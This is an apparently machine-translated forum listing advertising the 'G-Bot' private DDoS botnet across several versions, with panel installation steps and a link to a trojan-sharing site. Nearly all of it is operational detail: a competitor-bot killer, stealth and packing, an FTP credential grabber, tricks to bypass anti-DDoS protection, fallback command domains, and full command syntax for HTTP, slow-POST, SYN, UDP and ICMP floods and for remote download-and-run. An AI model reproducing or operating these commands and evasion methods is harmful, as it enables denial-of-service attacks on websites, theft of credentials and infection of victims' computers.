G-Bot 1.6.2 ,1.6.5, 1.6.7, 1.7 and G-bot 2.2 Private DDos Bot Full latest version

1) Create a database
2) Adjust the config.php
3) Fill the panel
4) Run install.php in your browser (http://freetrojanbotnet.com/Gbot... / Install.php) or fill in the database file g-bot.sql
5) Remove install.php
Full description of the bot and all its commands and features.
The latest version is currently 1.6.2
Special features:
[*] We have on board your own killer module that replaces bots competitors [Optima 6m, 7a, 7g, 8a; Dirt Jumper 1,2,2 Demo; Dream bot 1.7]
[*] Small stealth mechanism
[*] Weight bot [1.6.2] ~ 187kb uncompressed 75kb after packing UPX and crypto without problems.
[*] FTP grabber (now worth standard)
[*] Multi-poser
[*] The dynamic multithreading
It supports attacks such as:
[*] HTTP [Get, Post]
[*] SYN [Otherwise, the attack on the port, leaving behind a half-open ports]
[*] UDP
[*] ICMP [Ping]
Each type of attack has modes, here's their description:
[1] INT [. Int *** flood] - Intelligent mode, in this mode, the bot monitors the activity of the user,
if it does not - attacking, otherwise - wait, this mode can be used for any of the attacks
(. Intudpflood,. Intsynflood,. Inthttpflood,. Inticmpflood,. Intposthttpflood,. Oldhttpflood)
[2] HIGH [. Highhttpflood] - aggressive mode, in this mode, the bot generates maximum traffic,
the most powerful mode, but its use on a large quantity of flow causes the filling channel (bots can not reach admin)
This mode can only be used for flood http (. highhttpflood)
[3] Simple [. Simplehttpflood] - simple mode, in this mode, the bot connects to timeout
only works for flood http [. simplehttpflood]
[4] Post [. Posthttpflood] - the mode in which the bot sends POST requests to the site.
only works for flood http [. posthttpflood]
With modes like everything.
Now the team:
. Download http://host.com/exe.exe; Download -> run the file (only *. Exe!)
. Update http://host.com/exe.exe; Start updating the bot [download a new file on the link start and exit] (only *. Exe!)
Link with HTTP / ICMP flooding should be up to any page, after | indicates the number of threads, the exception. Simplehttpflood.
IMPORTANT NOTE! At the end of each team must stand - "".
. Httpflood http://host.com/script.php|10;
Get HTTP flood start in normal mode
. Inthttpflood http://host.com/script.php|10;
Get HTTP start flooding in Intelligent mode [monitors the activity of the user]
. Simplehttpflood http://host.com/script.php|1000;
Get HTTP start flooding in the "simple" mode, with a pause of 1000ms
. Posthttpflood http://host.com/s.php?l=1|10;
Post HTTP flood begin as normal [?l = 1 - transmitted as packet contents]
. Intposthttpflood http://host.com/s.php?l=1|10;
Post HTTP start flooding in the intellectual mode [?l = 1 - transmitted as packet contents]
. Highhttpflood http://host.com/script.php|10;
Get HTTP start flooding in agresivnom mode [bot attacks at their best in this mode, the system loads the
. Oldhttpflood https://host.com/index.php|10;
Start GET HTTP / HTTPS flooding in the old regime.
. Icmpflood http://host.com/script.php|10;
ICMP flood start in normal mode
. Inticmpflood http://host.com/script.php|10;
Start ICMP flood of intellectual mode
. Synflood | 10;
SYN flood start in normal mode
. Intsynflood | 10;
Start SYN flooding in the intellectual mode
. Udpflood | 10;
UDP flood start in normal mode
. Intudpflood | 10;
Begin UDP flood of intellectual mode
. Newtimeout 0 | 5000;
Change pause between requests to 5sekund teams.
. Stop 0;
Stop the execution of commands
For simultaneous attack host HTTP [Get], HTTP [Post] and write commands via ICMP;
An example:
. Httpflood http://host.com/script.php|10;. Posthttpflood http://host.com/s.php?l=1|10;. Icmpflood http://host.com/script.php | 10;
As a result of this command will create bots 3gruppy flows
10 will be a flood to flood http script.php,
10 packets will send post [l = 1] on s.php,
10 will host ping [ICMP].
-------------------------------------------------- ------------------------
The latest version is currently 1.6.5
Special features:
[*] We have on board your own killer module that replaces bots competitors [Optima 6m, 7a, 7g, 8a, 8e! ; Dirt Jumper 1,2,2 Demo; Dream bot 1.7]
[*] Small stealth mechanism
[*] Weight bot [1.6.5] ~ 182kb uncompressed
[*] FTP grabber (now worth standard)
[*] Multi-poser
[*] The dynamic multithreading
It supports attacks such as:
[*] HTTP [Get, Post]
[*] SYN [Otherwise, the attack on the port, leaving behind a half-open ports]
[*] UDP
[*] ICMP [Ping]
Each type of attack has modes, here's their description:
[1] INT [. Int *** flood] - Intelligent mode, in this mode, the bot monitors the activity of the user,
if it does not - attacking, otherwise - wait, this mode can be used for any of the attacks
(. Intudpflood,. Intsynflood,. Inthttpflood,. Inticmpflood,. Intposthttpflood,. Oldhttpflood)
[2] HIGH [. Highhttpflood] - aggressive mode, in this mode, the bot generates maximum traffic,
the most powerful mode, but its use on a large quantity of flow causes the filling channel (bots can not reach admin)
This mode can only be used for flood http (. highhttpflood)
[3] Simple [. Simplehttpflood] - simple mode, in this mode, the bot connects to timeout
only works for flood http [. simplehttpflood]
[4] Post [. Posthttpflood] - the mode in which the bot sends POST requests to the site.
only works for flood http [. posthttpflood]
With modes like everything.
-------------------------------------------------- ------------------------
Now the team:
. Download http://host.com/exe.exe; Download -> run the file (only *. Exe!)
. Update http://host.com/exe.exe; Start updating the bot [download a new file on the link start and exit] (only *. Exe!)
Link with HTTP / ICMP flooding should be up to any page, after | indicates the number of threads, the exception. Simplehttpflood.
IMPORTANT NOTE! At the end of each team must stand - "".
. Httpflood http://host.com/script.php|10; Get HTTP flood start in normal mode
. Inthttpflood http://host.com/script.php|10; Get HTTP start flooding in Intelligent mode [monitors the activity of the user]
. Simplehttpflood http://host.com/script.php|1000; Get HTTP start flooding in the "simple" mode, with a pause of 1000ms
. Posthttpflood http://host.com/s.php?l=1|10; Post HTTP flood begin as normal [?l = 1 - transmitted as packet contents]
. Intposthttpflood http://host.com/s.php?l=1|10; Post HTTP start flooding in the intellectual mode [?l = 1 - transmitted as packet contents]
. Highhttpflood http://host.com/script.php|10; Get HTTP start flooding in agresivnom mode [bot attacks at their best in this mode, the system loads the bot]
. Oldhttpflood https://host.com/index.php|10; Start GET HTTP / HTTPS flooding in the old regime.
. Intoldhttpflood https://host.com/index.php|10; Start GET HTTP / HTTPS flood in old intellectual mode.
. Icmpflood http://host.com/script.php|10; ICMP flood start in normal mode
. Inticmpflood http://host.com/script.php|10; Start ICMP flood of intellectual mode
. Synflood | 10; SYN flood start in normal mode
. Intsynflood | 10; Start SYN flooding in the intellectual mode
. Udpflood | 10; UDP flood start in normal mode
. Intudpflood | 10; Begin UDP flood of intellectual mode
. Newtimeout 0 | 50000; Change pause between requests teams to 50 seconds. [1sec = 1000ms]
. Stop 0; Stop the execution of commands
For simultaneous attack host HTTP [Get], HTTP [Post] and write commands via ICMP; team on the line
An example:
. Httpflood http://host.com/script.php|10;
. Posthttpflood http://host.com/s.php?l=1|10;
. Icmpflood http://host.com/script.php|10;
As a result of this command will create bots 3gruppy flows
10 will be a flood to flood http script.php,
10 packets will send post [l = 1] on s.php,
10 will host ping [ICMP].
-------------------------------------------------- ------------------------
The latest version is currently 1.7.0
Special features:
[*] Small stealth mechanism
[*] Weight bot [1.7.0] 113kb to 48kb after compression and
[*] Easy crypto
[*] The high efficiency of HTTP and SYN flood
[*] A random User-Agent and Referer (bypassing antiddosa)
[*] Multi-poser
[*] The dynamic multithreading
It supports attacks such as:
[*] HTTP [Get, Post]
[*] SYN [Otherwise, the attack on the port, leaving behind a half-open ports]
[*] UDP
[*] ICMP [Ping]
Each type of attack has modes, here's their description:
[1] Int [. Int *** flood] - Intelligent mode, in this mode, the bot monitors the activity of the user,
if it does not - attacking, otherwise - wait, this mode can be used for any of the attacks
(. Intudpflood,. Intsynflood,. Inthttpflood,. Inticmpflood,. Intposthttpflood,. Intslowposthttpflood)
[2] High [. Highhttpflood] - aggressive mode, in this mode, the bot generates maximum traffic,
the most powerful mode, but its use on a large quantity of flow causes the filling channel (bots can not reach admin)
This mode can only be used for flood http (. highhttpflood)
[3] Simple [. Simplehttpflood] - simple mode, in this mode, the bot connects to timeout
only works for flood http [. simplehttpflood]
[4] Post [. Posthttpflood] - the mode in which the bot sends POST requests to the site.
only works for flood http [. posthttpflood]
[5] Slow [. Slowposthttpflood] - the mode in which the bot sends POST requests randomly varying length and weighing up to 98.1kb.
only works for flood posthttp [. slowposthttpflood]
[6] G [. Ghttpflood] - the mode in which the bot before each request pings server
it's sort of a mixture ICMP and HTTP flood, resulting in ping, then Flooding,
excluded divorced load bots. [. Ghttpflood]
With modes like everything.
-------------------------------------------------- ------------------------
Now the team:
. Download http://host.com/exe.exe; Download -> run the file (only *. Exe!)
. Update http://host.com/exe.exe; Start updating the bot [download a new file on the link start and exit] (only *. Exe!)
Link with HTTP / ICMP flooding should be up to any page, after | indicates the number of threads, the exception. Simplehttpflood and. Ahttpflood
IMPORTANT NOTE! At the end of each team must stand - "".
. Httpflood http://host.com/script.php|10; Get HTTP flood start in normal mode
. Ghttpflood http://host.com/script.php|10; Start Get HTTP flood mode excluding "idle" burden on the bots
. Inthttpflood http://host.com/script.php|10; Get HTTP start flooding in Intelligent mode [monitors the activity of the user]
. Simplehttpflood http://host.com/script.php|1000; Get HTTP start flooding in the "simple" mode, with a pause of 1000ms
. Highhttpflood http://host.com/script.php|10; Get HTTP start flooding in agresivnom mode [bot attacks at their best in this mode, the system loads the bot]
. Posthttpflood http://host.com/s.php?l=1|10; Post HTTP flood begin as normal [?l = 1 - transmitted as packet contents]
. Intposthttpflood http://host.com/s.php?l=1|10; Post HTTP start flooding in the intellectual mode [?l = 1 - transmitted as packet contents]
. Slowposthttpflood http://host.com/s.php|10; Start Slow Post HTTP flood normally [contents of the package is made randomly]
. Intslowposthttpflood http://host.com/s.php|10; Start Slow Post HTTP flood in Intelligent mode [contents of the package is made randomly]
. Icmpflood http://host.com/script.php|10; ICMP flood start in normal mode
. Inticmpflood http://host.com/script.php|10; Start ICMP flood of intellectual mode
. Synflood | 10; SYN flood start in normal mode
. Intsynflood | 10; Start SYN flooding in the intellectual mode
. Udpflood | 10; UDP flood start in normal mode
. Intudpflood | 10; Begin UDP flood of intellectual mode
. Stop 0; Stop the execution of commands
For simultaneous attack host HTTP [Get], HTTP [Post] and write commands via ICMP; team on the line
An example:
. Httpflood http://host.com/script.php|10;
. Posthttpflood http://host.com/s.php?l=1|10;
. Icmpflood http://host.com/script.php|10;
As a result of this command will create bots 3gruppy flows
10 will get a flood on flood script.php,
10 packets will send post [l = 1] on s.php,
10 will host ping [ICMP].
-------------------------------------------------- ------------------------
The latest version is currently 2.2
[*] Small stealth mechanism
[ * ] Weight bot [2.2] ~ 41kb uncompressed (depending on the length of the domain )
[*] Multi- poser
[*] The dynamic multithreading
[ * ] 3 domain ( in the case of the first lock - bots knock on the second , in the case of blocking the second domain - bots knock on the third )
[*] Preparation of a randomly packages bots
[*] The ability to make the most randomly Post Package
[*] The ability to make the transition to a random bot pages , example : vBulletin forum , http://forum.ru/forum/showthread.php?p = <<< INT ( 1, 50000 ) INT >>> # post <<< INT ( 1, 50000 ) INT >>>
a result of this command, the bot will randomly ship themes and messages offline .
WARNING ! This feature bypasses some stupid antiddos .
Boat support attacks such as :
[*] HTTP [Get, Post]
[*] SYN [ Otherwise, the attack on the port , leaving behind a half- open ports ]
[*] UDP
[*] ICMP [ Ping ]
Each type of attack has modes , here's their description :
[1 ] Simple [. Simplehttpflood] - simple mode , in this mode, the bot connects to timeout
only works for flood http (. simplehttpflood)
[2 ] A [. Ahttpflood] - antiddos mode , in this mode, the bot is trying to circumvent antiddos by half, reducing the least possible burden on the server.
[3 ] Post [. Posthttpflood] - the mode in which the bot sends POST requests to the site.
only works for flood http (. posthttpflood)
[4 ] Slow [. Slowposthttpflood] - the mode in which the bot sends POST requests randomly varying length and weighing up to 98.1kb .
only works for flood posthttp (. slowposthttpflood)
With modes like everything.
-------------------------------------------------- ------------------------
Now the team :
. download http://host.com/exe.exe; Download -> run the file (only *. Exe!)
. update http://host.com/exe.exe; Start updating the bot [download a new file on the link start and exit ] (only *. Exe!)
A small digression :
<<< INT ( 1, 5 ) INT >>> - randomization of from 1 to 5
<<< STR ( 10 ) STR >>> - randomized 10 characters
Link with HTTP / ICMP flooding should be up to any page , after | indicates the number of threads , the exception . Simplehttpflood.
IMPORTANT ! At the end of each team must stand - "" .
. httpflood http://host.com/forum/showthread.php?p = <<< INT ( 1, 50000 ) INT >>> | 10; Get HTTP start flooding in the usual randomized for each request attacked topic (vBulletin)
. simplehttpflood http://host.com/script.php|1000; Get HTTP start flooding in the "simple" mode , with a pause of 1000ms
. ahttpflood http://host.com/forum/showthread.php?p = <<< INT ( 1, 50000 ) INT >>> | 10; Get HTTP start flooding in antiddos mode , randomized for each request attacked topic (vBullitin)
. posthttpflood http://host.com/s.php? $ login = <<< STR ( 8 ) STR >>> & password = <<< INT ( 100000 , 900000 ) INT >>> | 10; Post HTTP flood begin as normal [after the "$" character - is the content of the package , it is the following : login = <<< STR ( 8 ) STR >>> & password = <<< STR ( 8 ) STR >>> - passed contents of the package as "<<< STR ( 8 ) STR >>>" - is replaced by a randomly 8 characters , you can also use "<<< INT ( 100000 , 900000 ) INT >>>" - is replaced by a random number from 100000 to 900000 . ]
. slowposthttpflood http://host.com/s.php|10; Start Slow Post HTTP flood normally [ contents of the package is made randomly ]
. icmpflood http://host.com/script.php|10; ICMP flood start in normal mode
. synflood | 10; SYN flood start in normal mode
. ontcpflood [$ CONTENT $] | 10; SYN flood begin as usual between the tags [ $ and $ ] is necessary to prescribe the contents of the package.
. udpflood | 10; UDP flood start in normal mode
. stop 0 ; Stop the execution of commands
For simultaneous attack host HTTP [Get], HTTP [Post] and write commands via ICMP ; team on the line
. httpflood http://host.com/forum/showthread.php?p = <<< INT ( 1, 50000 ) INT >>> | 10;
. posthttpflood http://host.com/s.php $ login = <<< STR ( 8 ) STR >>> & password = <<< INT ( 100000 , 900000 ) INT >>> | 10;
. icmpflood http://host.com/|10;
As a result of this command will create bots 3gruppy flows
10 will get a flood flood Forum (vBullitin),
10 will send packets to a random post s.php,
10 will host ping [ICMP].
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